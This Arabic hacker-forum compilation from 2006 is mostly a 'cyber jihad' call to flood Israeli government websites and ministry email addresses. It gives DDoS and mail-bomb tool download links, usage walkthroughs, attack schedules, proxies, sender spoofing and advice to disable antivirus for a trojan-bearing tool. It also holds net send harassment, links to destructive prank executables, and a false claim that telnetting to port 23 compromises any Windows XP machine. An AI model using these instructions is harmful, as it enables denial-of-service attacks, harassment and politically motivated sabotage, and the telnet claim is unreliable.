تعلم الهاكر من الالف الى الياء 4

Mr.ghost · 28-01-2006, 05:25 AM

ارعب اللى انتا بتكلمة بدون برامج
________________________________________

لتخويف الضحيه ومحادثته بدون اى برنامج
تخيل ، خلال وجودك على الانترنت ، ان تظهر لك رسالة انه تم اختراقك عن طريق فلان ، ما مقدار الدهشة والذهول وفي بعض الاحيان الرعب الذي ستصاب به، وخصوصا لعلمك ان كومبيوترك خالي تماما من الفيروسات ، وانه توجد بجهازك احدث اصدار للفير وول..

الطريقة بتكون سهلة عن طريق ال net send ، فقط يكفيك معرفة الip بتاع صاحب الكومبيوتر الذي تريد ارسال الرسالة اليه
والامر يكون من شاشة الcommands ( يمكن فتحها عن طريق start > run ثم كتابة command او cmd)
الامر يكون net send ip message

مثلا بفرضا ان الفاير وول بتاعك اعطاك رسالة تحذير بوجود من يريد ان يتسلل الى جهازك ، وطبيعي ان الفاير وول سيمدك برقم الip لهذا المتسلل ، وليكن مثلا 216.26.109.138
يمكننا ان نرعب هذا المتسلل ونكتب في الكوماندز الامر التالي
net send 216.26.109.138 dont mess with my stuff , thanks for calling

الnet send هو امر من اوامر net ، ويمكنك استعراض اوامر الnet عن طريق كتابة net help ، ومنها اوامر مثل net view و net use يمكن استخدامها في اختراق المنفذ 139

ملحوظة: net send لن تعمل سوى على winxp, win2000 , win nt

تدمير المواقع اليهوديه.... الجهاد الالكتروني
________________________________________

**بسم الله الرحمن الرحيم**
"وأعدوا لهم ماستطعتم من قوة و من رباط الخيل ترهبون به عدو الله وعدوكم"
الجهاد الإلكتروني

إخواننا في الله ..
السلام عليكم ورحمة الله و بركاته و الصلاة والسلام على سيدنا محمد و سيد الخلق أجمعين وآله وصحبه
و من والاه
اما بعد ....
تعرفون جميعا أن الحرب الدائرة على أشدها ليست حربا على فلسطين أو بلد معين .. بل دعكم من وسائل الإعلام
المغرضة و رياء رجال السياسة و الدهاء زعمائنا هداهم الله الى طريق الصواب قبل فوات الأوان ..
انها حرب اليهود الصهيون على الإسلام .. و لما كانت الحرب على الإسلام .. فقد أصبح الجهاد فرض عين على
كل مسلم .. وليس فرض كفاية .. بمعنى انك يجب أن تشارك بنفسك .. وربما انت تفكر ماذا تقول لرب العالمين يوم تسأل عن هذا اليوم ..

أخي المؤمن .. لم تفتك الفرصة بعد , يمكنك المشاركة فعليا في الحرب فلازال هناك دور لك ..
دمر معلومات عدوك .. شن الهجمات ضد مواقع وعناويين بريد الاستعمار الإسرائيلي الصهيوني.

والمشاركة غاية في السهولة ولا تحتاج إلى الكثير من الجهد. بل تكفي مبادئ الإنترنت الأساسية للتمكن من المساهمة
الفعالة

ولا تعتقد أن مثل هذه الحملات لا فائدة منها ، ضد المواقع الإسرائيلية الصهيوينة. فكثير من العمليات السابقة نجحت على
بساطة منفذيها وبساطة المعلومات لديهم ( على أمل أن تنجح هذه المجموعة من الهجمات ) .

علماً بأنه يجب أن نناضل ضد المستعمر الصهيوني بكل الوسائل المتاحة لنا ، وبكافة الطرق ، حتى نستأصل شأفتهم من
الأراضي المقدسة .

ورجاء لمن لا يستطيع المساعدة بنفسه أن ينشر هذه الرسالة في كل مكان حتى تتسنى الفرصة لغيرك أن يساعد وتنال
الأجر بإذن الله .. انسخها في كل المنتديات و أرسلها الى كل مكان as HTML حتى تظهر كما هي أو حتى ضعها
كما هي في صفحتك الخاصة .. و حسبي الله على كل من يتهاون ...
--------------------------------------------------

هذه المجموعة من الهجمات تقسم إلى قسمين:

1- هجمات لتدمير مواقع إسرائيلية.

2- هجمات لتدمير عناويين بريدية إسرائيلية هامة.

( يمكنك تحميل أي من البرامج المذكورة في الأسفل وقراءة شرح عنها وذلك بالإطلاع على القسم المسمى شرح وتحميل
البرامج في آخر هذا المقال ).

--------------------------------------------------

1- هجمات لتدمير مواقع إسرائيلية

وهي تقسم إلى قسمين:

أ- هجمات منظمة باستخدام " برنامج الدرة لإدارة الحرب المعلوماتية "، ( يحدد المواقع المراد الهجوم عليها
برنامج الدرة بالاعتماد على الخيار المقدم من قبل الجهة المشرفة على مشروعه ).

ب- هجمات منظمة باستخدام برنامج: " evilping و winsmurf و مجاهدين النت
و Httpbomber " لتدمير مواقع إسرائيلية ( يحدد المواقع المراد الهجوم عليها موقع فلسطيني عن طريق
الرسالة الاخبارية التي يوزعها على جميع الأصدقاء والمشتركين وفي معظم المنتديات العربية ).
-------------------------------------------------
2- هجمات لتدمير عناويين بريدية إسرائيلية هامة

تتم بشكل غير منتظم وإنما عن طريق عدة برامج تدمير بريدية هامة،وهي من البرامج التي تم انتقاءها من قبل موقع فلسطيني
كأفضل برامج تدمير بريد ( البرامج هي: kaboom!3 و aenima و FakeMail )

وذلك على العناويين التالية:
( ملاحظة : قائمة العناويين خاضعة للتحديث المستمر. ويمكن لأي شخص يعرف عنواناً إسرائيلياً أن يشارك معنا
وذلك بإرسال العنوان مشكوراً إلى falastiny@ajeeb.com )

وزير الاتصالات : sar@moc.gov.il
وزير الدفاع : sar@mod.gov.il
وزارة التعليم : sar@education.gov.il
وزيرة البيئة : sar@environment.gov.il
وزير الاقتصاد : sar@mof.gov.il
وزير الخارجية : sar@mofa.gov.il
وزير الصحة : sar@matat.health.gov.il
وزير الإسكان : sar@moch.gov.il
وزير الهجرة : sar@moia.gov.il
وزير التجارة والصناعة : sar@moit.gov.il
وزير الداخلية : sar@moin.gov.il
وزير الامن الداخلي : sar@mops.gov.il
وزير العدل : sar@justice.gov.il
وزير الراحة والعمل : sar@molsa.gov.il
وزير البنية التحتية : sar@mni.gov.il
وزير الدين اليهودي : sar@religions.gov.il
وزير الرياضة والثقافة والعلم : minister@most.gov.il
وزير السياحة : sar@tourism.gov.il
وزير الاتصالات : sar@mot.gov.il

ومن الملاحظ أن اللاحقة الإقليمية للمواقع الإسرائيلية هي: ( gov.il )

يمكنك باستخدام برامج تدمير البريد إرسال عدد ضخم من الرسائل إلى أي من هذه العناوين، ولا داعي للتقيد بأي وقت
محدد للهجوم على هذه العناوين، فيكفي أن تقوم بضغط زر أو زرين مرة أو مرتين عند دخولك الإنترنت ومن ثم الانتظار قليلاُ
حتى يتم بالفعل إغراق وتعطيل عناوين البريد ...
-------------------------------------------------

*** شرح العمليات***
1-هجمات تدمير المواقع الإسرائيلية:

1- برنامج الدرة لإدارة الحرب المعلوماتية :

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...iles/doraah.zip

شرح البرنامج:

هذا البرنامج هو عبارة عن برنامج يقوم بتدمير المواقع الإسرائيلية المحددة من قبل مصمميه مع العلم أن البرنامج لا يكتسب
قيمته إن لم يكن عدد المستخدمين له في نفس اللحظة، والذين يحاولون جميعاً تدمير نفس العنوان أكثر من 100 مستخدم.

نرى في واجهة البرنامج إطاراً بعنوان url وفيه عنوان موقع لا يمكن التعديل عليه وهو العنوان الذي تم اختياره أخيراً
من قبل مصمم البرنامج. وذلك بهدف تدمير هذا العنوان.

يجب الضغط على كلمة Update في يمين المربع وذلك في أول مرة يتم فيها تشغيل البرنامج وذلك لتحديث الموقع
( أي تحديث لآخر عنوان لموقع تم الاتفاق على تدميره ) كما يجب الضغط على هذا الزر في كل مرة يتم فيها تشغيل
البرنامج تقريبا وذلك كي تظل على اطلاع بعنوان الموقع الذي تشن الهجمة عليه في هذه الأوقات ...

ونرى أسفل هذا المربع زرين أحدهما بعنوان: Attack والآخر Stop الأول لبدء عملية الهجوم والثاني لإيقافها

في أقصى اليمين نجد رقمين الأول يدل على عدد المرات التي نجح البرنامج في إرسال قنبلته إلى الموقع
( قد يصل عدد المرات إلى 500 دون ملاحظة أي تغير على الموقع وذلك في حال كنت تستخدم هذا البرنامج وحدك
أي إن لم يكن هناك أحد في مكان ما من العالم يقوم بنفس ما تقوم به أنت في نفس اللحظة ).

نجد في القسم اليساري من البرنامج وأسفل مربع url مربعاً بعنوان Proxy server وهنا يمكنك وضع
عنوان الـ Proxy الذي تستخدمه لدخول الإنترنت مع الـ Port في حال وجودهما.

في أسفل الـ Proxy server يوجد Socks Proxy وهو لبروكس الـ Socks الإصدار
الخامس على ما يبدو من رقم البورت الإفتراضي ويجب لتفعيل هذا الخيار الضعط على زر Connect through a SOCKS Proxy ومن ثم كتابة الـ Socks Server والـ Socks Port وهو في الحالة الإفتراضية 1080 أما الـ Socks server فهو في الحالة الإفتراضية، وفي حال استخدام برنامج Http - Tunnel هو : ( 127.0.0.1 ) ويفضل استخدام الـ Socks Proxy إن وجد ( أي إن كانت شركة الإنترنت المشترك بها تدعم هذه التقنية) أوإن لم يوجد، فعن طريق برنامج http - tunnel الشهير، وذلك لأن هذا البروكسي أسرع وأكثر فعالية من غيره.

أما بالنسبة للقسم الأخير من البرنامج وهو القسم اليميني الأسفل فهو يحوي سرعة إرسال الضربات وهو في الوضع
الإفتراضي 800 Ms يمكنك تقليل هذا الرقم إلى 400 أو 200 عن طريق الزالقة الموجودة إلى يسار الرقم
وهذا في حال كانت إستجابة الموقع المراد تدميره إلى الضربات كبيرة أي إذا كان الرقم يزداد بسرعة في خانة
Successوهذا يعني أن الموقع العدو يستقبل الضربات بشكل سريع وفوري ...

يمكنك الإطلاع على آخر أخبار الحرب عن طريق زر War News ولكن على ما يبدو فهذا البرنامج مهجور من قبل
أصحابه، لذلك سنقوم نحن بتنظيم العمليات بوساطته خلال ( هجمات رام الله الإباء والشموخ )..

مخطط العمليات باستخدام برنامج الدرة:

نقوم كل يوم خميس وجمعة ما بين الساعة 5.00 مساءً والساعة 7.00 مساءً بتوقيت غرينتش بفتح البرنامج والبدء
بممارسة الهجمات على الموقع المختار في تلك اللحظة وهكذا...
------------------------------------------------
2- برنامج evilping :

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...es/evilping.zip

شرح البرنامج:

هذا البرنامج بسيط جدا جدا في الاستخدام فيكفي وضع عنوان الموقع الإسرائيلي في الخانة المكتوب في داخلها
www.microsoft.com ( بعد حذف هذه الجملة ) ومن ثم تحديد عدد الضربات المراد إرسالها في
الخانة المكتوب داخها 5 ومن ثم ضغط زر start sending ping attacks وذلك كي
يبدأ البرنامج عمله.

مخطط العمليات باستخدام برنامج evilping :

بكل بساطة هذا البرنامج لم نتأكد بعد 100 % من فعاليته ولكن أصحابه أكدوا كثيراً عمله بشكل جيد، لذلك لن نقوم
باستخدام البرنامج بشكل منفصل بل سيكون جزءاً من هجمات برنامج الدرة. أي عندما نستخدم برنامج الدرة أيام الخميس
والجمعة نقوم بفتح هذا البرنامج ونكتب فيه نفس اسم الموقع المختار من قبل برنامج الدرة وذلك للمساهمة في إرهاق الموقع.

نذكر أن أيام العمليات هي الخميس والجمعة من الساعة 5.00 مساءً وحتى الساعة 7.00 مساءً بتوقيت غرينتش.
------------------------------------------------
3- برنامج Httpbomber :

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...tpbomber101.zip
http://www.geocities.com/eljehadfiles/bomber.zip
http://www.geocities.com/hagamat2002/bomber.zip
http://www.geocities.com/eljehad1/bomber.zip
http://www.geocities.com/eljehad/site/bomber.zip

شرح البرنامج:

برنامج بسيط وسهل الاستخدام وهو من البرامج التي سيقوم موقع فلسطيني بتحديد الموقع الهدف المراد الهجوم عليه وذلك
في سبيل تدمير الموقع بيد واحدة لأن البرنامج لن يكون له أي أثر إن لم يكن عدد المستخدمين له على نفس الموقع في نفس
الوقت أكثر من 100 مستخدم.

نجد مربعاً في أعلى البرنامج مكتوب بجانبه إلى اليسار Target Site نكتب في هذا المربع عنوان الموقع
الإسرائيلي المراد الهجوم عليه والذي سيحدده موقع فلسطيني أسبوعياً
( يرجى إرسال رسالة إلى العنوان falastiny@ajeeb.com تحوي طلب انتسابك إلى قائمة
(هجمات رام الله الإباء والشموخ) وذلك لإطلاعك أسبوعياً على الموقع الهدف، كما يمكنك قراءة الموقع الهدف من
خلال المنتديات العربية حيث ينشر الخبر في معظمها، كما يرجى من السادة المستخدمين للإنترنت إرسال اقتراحاتكم بشأن
تحديد المواقع الإسرائيلية للهجوم عليها ) ..

بعد كتابة اسم الموقع ننتبه لخيار Use Proxy في حال كنا نرتبط بالإنترنت مع وجود Proxy ومن ثم نكتب
عنوان الـ Proxy في الحقل Address ورقم البورت في حقل Port

نختار في قسم Type of attack نوع الضربة ولدينا نوعان هما Normal Request
وهو نوع عادي من الضربات ينصح باستخدامه. أما النوع الآخر فهو Post Request فهو أكثر تقدماً لكنه
لم يشهد له بالنجاح دائماً.

بعد كل هذا نضغط على زر Start لبدء تنفيذ الهجوم...

بالنسبة لمشكلة البروكسي :

الإخوة الذين يتصلون بالانترنت عن طريق بروكسي (الذي يكتبونه في خيارات انترنت )
عليهم وضع البروكسي والبورت الخاص بشركتهم.. والشرح هنا
http://www.geocities.com/eljehad/exhtt.htm

أما الإخوة في مصر مثلا الذين لا يتصلون عن طريق البروكسي يمكنهم استخدام أحد هذه البروكسيات
proxy : bess-proxy3.iu5.org
port : 7021
أو
proxy : bess-proxy2.iu5.org
port : 7021
أو
proxy : bess-proxy1.iu5.org
port : 7021
أو
proxy : 64.108.32.30
port : 8801
أو
proxy : 211.114.196.173
port : 8081
ويجب أن يقوم البرنامج بعد الضربات hits
-----------------------

4- برنامج مجاهدين النت:
عنوان تحميل البرنامج:

http://mypage.ayna.com/drmmm/mojahdin.zip
http://mypage.ayna.com/drmmm/mojahdin.exe
http://hrj.topcities.com/txt/program/MojahdinAlnet.zip
شرح البرنامج:

البرنامج لا يحتاج الى شرح فهو عربي كامل وما عليك الى ان تفتح البرنامج ثم تذهب الى قسم (تدمير المواقع) وتنقر
على كلمة (دمر الموقع)
يجب فتح اكثر من نافذة من البرنامج من 5الى10 نوافذ اي قم بتشغيل البرنامج والنقر على ايقونتة اكثر من 5 مرات
ثم قم بالذهاب الى قسم تدمير المواقع وانقر دمر الموقع في جميع النوافذ التي فتحتها (عملية تكرار)
----------------------------------------------
5- برنامج Winsmurf :

عنوان تحميل البرنامج:

http://www.geocities.com/eljehadfiles/smurf.zip
http://mypage.ayna.com/lnt/winsmurf.zip
http://www.geocities.com/hagamat2002/smurf.zip
http://www.geocities.com/eljehad/site/smurf.zip
شرح البرنامج:

http://www.home4arab.com/members/is...er6/roor/ws.htm
او
http://www.geocities.com/eljehad/exw.htm
-----------------------------------------------------------
2- هجمات تدمير العناويين البريدية الإسرائيلية الهامة:

[ ملاحظة هامة : هذه الهجمات لن تكون منظمة " أي لا يوجد وقت محدد للقيام بها " بل يمكن أي مستخدم فتح
أحد البرنامج التي سنوردها بعد قليل والقيام بإرسال عدد معين من الرسائل " كلما زاد عددها كان الوضع أفضل "
إلى أي عنوان إسرائيلي يريده، وذلك بهدف إغراقه وتدميره. وقد قمنا بإيراد عدد من العناوين الإسرائيلية الهامة في الأعلى
وهي من العناوين التي نفضل شن الهجمات عليها ] ..

1- برنامج kaboom!3 :

( ملاحظة هامة جدا: هذا البرنامج يحوي Trojan hourse وسوف يقوم مضاد الفيروسات لديك بإيقاف
البرنامج لذلك يجب توقيف مضاد الفيروسات أولاً ثم تشغيل البرنامج لأن الفيروس غير موجه للقضاء على جهازك وإنما يمكن
إلحاقه بالرسائل التي يرسلها إلى العدو ، لذلك كن مطمئناً لأن البرنامج لن يؤذيك بحال من الأحوال )...

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...les/kaboom3.zip

شرح البرنامج:

عند فتح هذا البرنامج تظهر لنا نافذة صغيرة فيها 3 خيارات هي MailBomber ويستخدم لتدمير عنوان البريد
المطلوب ، وخيار Mailing List والذي يستخدم لإضافة العنوان البريدي المطلوب إلى قوائم إخبارية متعددة
مما يؤدي إلى أن هذه القوائم ستبدأ بإرسال رسائل بشكل كبير جداً ومزعج لأصحاب البريد هؤلاء أما الخيار الأخير
فهو Close لإغلاق البرنامج

الخيار - MailBomber :

عند الضغط على هذا الزر تظهر لنا نافذة فيها العديد من الحقول، الحقل To نكتب فيه المرسل إليه "عنوان بريدي واحد"
( من عناويين بريد الأعداء ) ، الحقل From نكتب فيه اسم المرسل
( تأكد ألا تكتب عنوانك الحقيقي ، بل اكتب أي عنوان آخر ويفضل أن يكون من باقي العناوين الإسرائيلية المدرجة في
القائمة في الأعلى .

(السبب: مثلاً وزارة السياحة: ستقوم بحجب أي عنوان يقوم بإزعاج بريدها ومنعه من مراسلتها نهائياً ،
ولكنها لن تستطيع بتاتاً منع عنوان وزارة الخارجية الإسرائيلية، من إرسال رسالة إليها ، وهذا ما نستغله هنا .

كما أنصح بعدم استخدام نفس العنوان لأكثر من نصف ساعة لأنه سيتم حجبه تلقائياً بل يجب تغيير عنوان المرسل كل
نصف ساعة أو ربع ساعة وكلما تم تغيير عنوان المرسل أكثر كان الوضع أفضل ).

الحقل Server نكتب فيه ملقم البريد الذي نستخدمه نحن ويمكن أن يكون Pop mail أو Web mail
( فمثلاً في سوريا يمكن وضع هذا العنوان: scs.scs-net.org وهو يستخدم سيرفر الجمعية
السورية للمعلوماتية في إرسال البريد " كن واثقاً من أن أحداً لن يكتشف فعلتك هذه فهي تتم بسرية 1000 % " )
كما يمكنك اختيار إحدى السيرفرات الموجودة في القائمة ، كما يمكنك كتابة عنوان سيرفر
الـ hotmail أو الـ yahoo ....

في حقل Priority والذي يعني ( أهمية الرسالة )، أؤكد على وضع الخيار High وذلك لاستقبال رسالتك
على أنها ( شديدة الأهمية ) فيكون لها أفضلية على غيرها من الرسائل.

في حقل Subject اكتب أي اسم كان وأي مجموعة من الحروف وهي ستكون عنوان الرسائل المرسلة.

بالنسبة لحقل Message Body وهو نص الرسالة، أطلب منكم الآن أن تدعونا نرى شطارتكم، فكلما كانت
الرسالة أطول ولا تعني شيئاً كان الوضع أفضل، فمثلاً يمكن أن تكون الرسالة عبارة عن 100 سطر من حرف الـ A
أو أية خربشة أخرى ، كما يمكن وضع عبارات التنديد والتهديد للعدو الصهيوني باللغة الإنكليزية.

يمكن وضع إشارة صح عند Cc وكتابة عنوان إسرائيلي آخر في الحقل الفارغ وذلك كي يتم مشاركة هذا العنوان بالهجوم.

في خانة Number Of Messages ضع عدد الرسائل التي تريد إرسالها إلى العنوان المذكور
أو اختر mail Perpetually وذلك كي يبدأ بإرسال عدد من الرسائل غير منتهي حتى يتم إيقاف البرنامج.

بعد كل هذا اضغط زر Send وتابع العداد الذي يظهر في أعلى يمين البرنامج وهو يشيير إلى عدد الرسائل التي وصلت

الخيار Maling Lists:

عند الضعط على هذا الزر تظهر لك نافذة قم بوضع إشارة صح في جميع المربعات وذلك كي يتم إشراك عنوان بريد العدو
بكل هذه القوائم البريدية.

املأ الآن الحقول:

Address عنوان بريد العدو.

Name ضع هنا اسماً لا على التعيين.

Server تم شرح هذا المصطلح واستخدامه سابقاً.

ثم اضغط زر Subscribe حتى يتم البدء. ويريك العداد الموجود أسفل حقل : Server
عدد النشرات التي بقيت حتى يتم إشراك العنوان بها.
--------------------------------------------
2- برنامج aenima :
( هذا البرنامج من أقوى برامج تدمير البريد ).

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...es/aenima20.zip

شرح البرنامج:

بعد فتح البرنامج تظهر لك رسالة في وسطها زر Ok غير واضح المعالم ، اضغط عليه ليتم فتح النافذة الرئيسية للبرنامج.

البرنامج مقسوم إلى خمس مراحل يقوم المستخدم خلالها بتعبئة حقول عديدة حتى يصل إلى مرحلة البدء بإرسال الرسائل
ويتميز هذا البرنامج بقدرته وسرعته العجيبة على تدمير البريد المعادي.

القسم الأول من البرنامج هو Mail Delivery نقوم فيه بكتابة اسم المرسل وعنوانه والعنوان الذي سترسل
إليه الردود ( طبعاً هذه المعلومات يجب أن تكون غير صحيحة ).

ثم نكتب اسم المرسل إليه وليس من الضرورة أن يكون صحيحاً. ومن ثم عنوانه البريدي الصحيح.
كما يمكننا في حقلي Carbon Copy و Blind Carbon Copy وضع عنوانين بريديين آخرين
لتدميرهما بنفس الوقت ( بإرسال نفس الرسالة لهما ) .

بعد تعبئة هذه البيانات ننتقل إلى القسم Mail Options وفيه يمكننا تحديد عدد الرسائل في القسم اليساري
العلوي من البرنامج أو اختيار Bomb Until Stopped وذلك للبدء بإرسال عدد لا منتهي من الرسائل
ينقطع عند توقيف البرنامج ، في حقل Smtp Server نكتب اسم السيرفر كما سبق وأشرنا,

باقي خيارات هذه الصفحة ليست عظيمة الأهمية.

ثم ننتقل إلى القسم Header الذي يستخدم لتحديد التاريخ وما شابه من أشياء تظهر لدى المرسل إليه وليس من
الضروري تعبئة هذه الحقول.

ثم القسم Message وفيه نقوم بكتابة عنوان الرسالة ونصها

ثم نضغط قسم Send ثم زر Start فيبدأ العداد على اليمين بعد الرسائل التي تم إرسالها إلى العدو..
---------------------------------------------
3- برنامج FakeMail :

عنوان تحميل البرنامج:

http://www.geocities.com/falastinys...es/fakemail.zip

شرح البرنامج:

هذا البرنامج بسيط جدا فقط افتحه ثم ضع اسم المرسل وعنوانه ( الوهمي طبعاً ).ثم عنوان المرسل إليه ثم عنوان
الرسالة وفي النهاية الرسالة. ومن ثم اضغط على القسم Server وضع اسم ،Server واسم مستخدم وهمي،
ثم اضغط زر Send حتى يبدأ البرنامج بإرسال الرسالة بشكل متكرر حتى يتم إيقافه.
-------------------------------------------------

نداء خاص : أرجو أن تحكم ضميرك قبل أن تستخدم المعلومات الواردة في هدف غير الجهاد ..
تذكر أن الله يراك و تذكر أنك ستسأل عما فعلت حين أتيحت لك الفرصة .. هل شاركت ؟ هل أتحت الفرصة لغيرك
أن يشارك ؟ أم هل استخدمت العلم في هدف آخر ؟

منقول معرفش منين
بس يا ريت كلنا نشارك

الحماية الذاتية
________________________________________

الحماية الذاتية ومعرفة اذا كان جهاز محمل بي patch ام لا
الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :

1-أنقر على إبداء Start
2- أكتب في خانة التشغيل Run الأمر : rigedit
3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
- HKEY_LOCAL_MACHINE
- Software
- Microsoft
- Windows
- Current Version
- Run
4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete

================================================== ======

الطريقة الثانية بواسطة الأمر :msconfig

1- انقر ابداء Start
2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.

================================================== ======

الطريقة الثالثة بواسطة الدوس Dos:
هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
1- إفتح الدوس من محث MSDos بقائمة إبداء
2- أكتب الأمر التالي : C:/Windowsdir patch.*
3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
C:Windowsdelete patch.*

طريقه لاختراق وندوز اكس بي
________________________________________

سأريكم الان أسهل طريقه لاختراق وندوز اكس بي عن طريق الثغره الخاصه به

المتطلبات :

1- برنامج سكانر
2- التل نت (يمكن تشغيله عن طريق Start --->Run--->TelNet)
3- وندوز غير نظام اكس بي

الطريقه :-

تسوي سكان حق ايبيات فيها ثغره ببورت 23 (وهو بورت الثغره+بورت التل نت)

ثم تجيب تفتح التل نت وتروح حق Connect ---> Remote system

راح تطلعلك نافذه صغير في الخانه الاولى :-

Host name : تكتب الايبي الللي خذيته من السكانر
والخانه الثانيه :-
Port : تكتب رقم البورت 23
و في الخانه الثالثه لاتفعل شيء
ثم اظغط Connect

وهنا اخترقت اي جهاز في وندوز اكس بي
الطريقه فعاله 100%

مقالب مسنجر !!
________________________________________

بسم الله الرحمن الرحيم

اذا ما تشتغل الوصله سوها كوبي بيست

1: يخفى ساعة الويندوز من شريط إبدأ
http://www.ardra.host.sk/1.zip
:يخفي الرموز من شريط ابدأ
http://www.ardra.host.sk/2.zip

3:يخفي رموز سطح المكتب كلها ... اعمل تحديث تعود كما كانت
http://www.ardra.host.sk/3.zip

4:يقوم بايقاف التشغيل في الجهاز
http://www.ardra.host.sk/4.zip

5:يخفي شريط ابدأ كليا
http://www.ardra.host.sk/5.zip

6:يجعل الماوس ترقص في الشاشة، رائع جدا
http://www.ardra.host.sk/6.zip 7:هذا يرسل أمر للطابعة بطباعة كلمة فورمات
http://www.ardra.host.sk/7.zip

8:يقوم بفتح ال CD_ROM
http://www.ardra.host.sk/8.zip

9:يقطع الاتصال بالإنترنت
http://www.ardra.host.sk/9.zip

10:يوهمك بأن الشاشة تحترق
http://www.mixuae.com/e7raq_alshashah.exe

12:يوهمك بوجود إحد أعظاء الهكر في جهازك
http://www.mixuae.com/hkr.exe

13:تسيل الشاشة إلى أسفل
http://www.mixuae.com/sylan_alshashah.exe

14:أنتبه......قنبلة موقوته في جهازك
http://www.mixuae.com/alqonbelah.exe

15:تظهر لك رسالة تفيد بأن عندك برنامج غير شرعي
http://www.mixuae.com/brnamaj_mokarsan.zip

16:يعكس أزرار الماوس مع رسالة إعتذار
http://www.mixuae.com/3ks_azrar_almaws.exe

17:يقلب الشاشة رأس على عقب
http://www.mixuae.com/qalb_alshashah.exe

18:من أفضل المقالب سيعجبك أكيد
http://www.mixuae.com/Y2K.exe

19:يقوم بحبس الماوس لفترة مؤقته يعود بعدها كل شيء كما كان
http://www.mixuae.com/7bs_almaws.exe

20:سيشعرك بأن أحد يتجسس عليك
http://www.mixuae.com/altjss.exe

21:سيجعل الشاشة تومض بسرعة مما يسبب الصداع
http://www.mixuae.com/wmeed_alshashah.exe

22:سيقوم بغلق الجهاز مع رسالة أسف
http://www.mixuae.com/eghlaq_aljehaz.exe

23:يعطيك مسألة حسابية ويطلب منك حلها وإلا.......جربه
http://www.mixuae.com/bo_sb3h.exe

24:يجعل الماوس أحول لمدة معينه
http://www.mixuae.com/almaws_ala7wal.exe

25:يوهمك بأن فيروس حربوش في جهازك
http://www.mixuae.com/7rbosh.exe

26:أيقونة إبدأ تقوم بحركات مذهلة
http://www.mixuae.com/jnon_ebda.exe

27:يقوم بعمل هزة وارتجاج لسطح المكتب
http://www.mixuae.com/zlzal_alshashah.exe

28:سيقوم بعمل داونلود وهمي لأحد الفيروسات
http://www.mixuae.com/dawnloob_whme.exe

29:يفتح جميع البرامج الموجودة في الجهاز بشكل جنوني
http://www.mixuae.com/ente7ar.exe

30:رجاء لاتجاوب على هذا السؤال بنعم
http://www.mixuae.com/soial_m7rj.exe

31:تومض الكيبورت بسرعة وجنون
http://www.mixuae.com/wamed_alkeyboard.exe

32:يقوم بحذف الوندوز
http://www.mixuae.com/7athf_alWindows.exe

33:يحدث سيلان للشاشة ولا يمكنك السيطرة عليه
http://www.mixuae.com/fydan_alshashah.exe

34:تدور الشاشة بـسرعة لدقيقه واحدة ثم يرجع كل شيئ كما كان
http://www.mixuae.com/dwran_alshashah.exe

35:يتغير شكل مؤشر الماوس لأشكل كثيرة بسرعة البرق
http://www.mixuae.com/jnon_almaws.scr

36:يقوم بحذف سطح المكتب لكن لا تخف ستعود بعد اعادة التشغيل
http://www.mixuae.com/ms7_albramej.exe

37:برنامج الظلام مخيف ويغلق عليك الشاشة بالتدريج
http://www.mixuae.com/aldalam.exe

38:ينسخ الماوس ويقوم بحركات مذهلة على الشاشة
http://www.mixuae.com/mawsen.scr

39:عندما تنتهي من ملأ الجدول ستضحك بشراهة
http://www.mixuae.com/ed7ak.exe

40:مجموعة من الحشرات الغريبة تغزوا جهازك
http://www.mixuae.com/alhasharat.exe41:يغرق جهازك بالماء وهو حافظة شاشة رائعة
http://www.mixuae.com/e7raq_alshashah.exe

42:رسالة غرام تتحول إلى رسالة توبيخ
http://www.mixuae.com/b6aqt_7ob.scr

43:يقوم بعمل هزة لسطح المكتب لدقيقة واحدة
http://www.mixuae.com/alzelzal.scr

45:كل من فتح هذا المقلب أرتعب
http://www.mixuae.com/alro3b.exe

46:يفتح ملفات كثيرة يصعب عليك إغلاقها
http://www.mixuae.com/mlfat.exe

47:يقوم بتكبير الماوس بشكل خيالي
http://www.mixuae.com/tkber_almaws.zip

48:إذا حسيت بتعب وأنت جالس على الجهاز فهذا يريحك واجد
http://www.mixuae.com/banadol.exe

اختراق المواقع عن طريق الـ Ftp
________________________________________

اختراق المواقع عن طريق الـ Ftp

--------------------------------------------------------------------------------

اختراق المواقع عن طريق الـ FTP

اختراق المواقع ببرامج الاف تي بي

اختراق المواقع ببرامج الاف تي بي
اختراق المواقع ببرامج الاف تي بي

بعد اذن طبعاً محترف اختراق المواقع
اختراق المواقع
اختراق اى موقع ليس مجانى بمعنى انه يكون اسم نطاقى
yourname.com
yourname.net
yourname.org
yourname.biz
yourname.info
other
يكون من الصعب اختراقة بالنسبة لاى هكر لانه غالبا ما يستخدم DNS Server
ونظم حماية كثيرة قد تصعب نسبة اختراقة 99%

لكن كن معى فى هذا الموضوع وسيكون كل شىء سهل بذن الله

-------

يجب عندما تحارب شخص ان تعلم كل شىء عنه وهذا ما سنستخدمة فى هذه الخطوة
يجب ان نعرف نظم الحماية التى يستخدمها الموقع
ومن صاحب الموقع
وكل شىء اولا كى نستطيع دخول ساحة المناورة

---

لتقوم بذلك قم بالدخول الى هذا الموقع
http://www.whois.net

فى السطر الثانى من الصفحة التى ستظهر لك ستجد هذا السطر
WHOIS Lookup
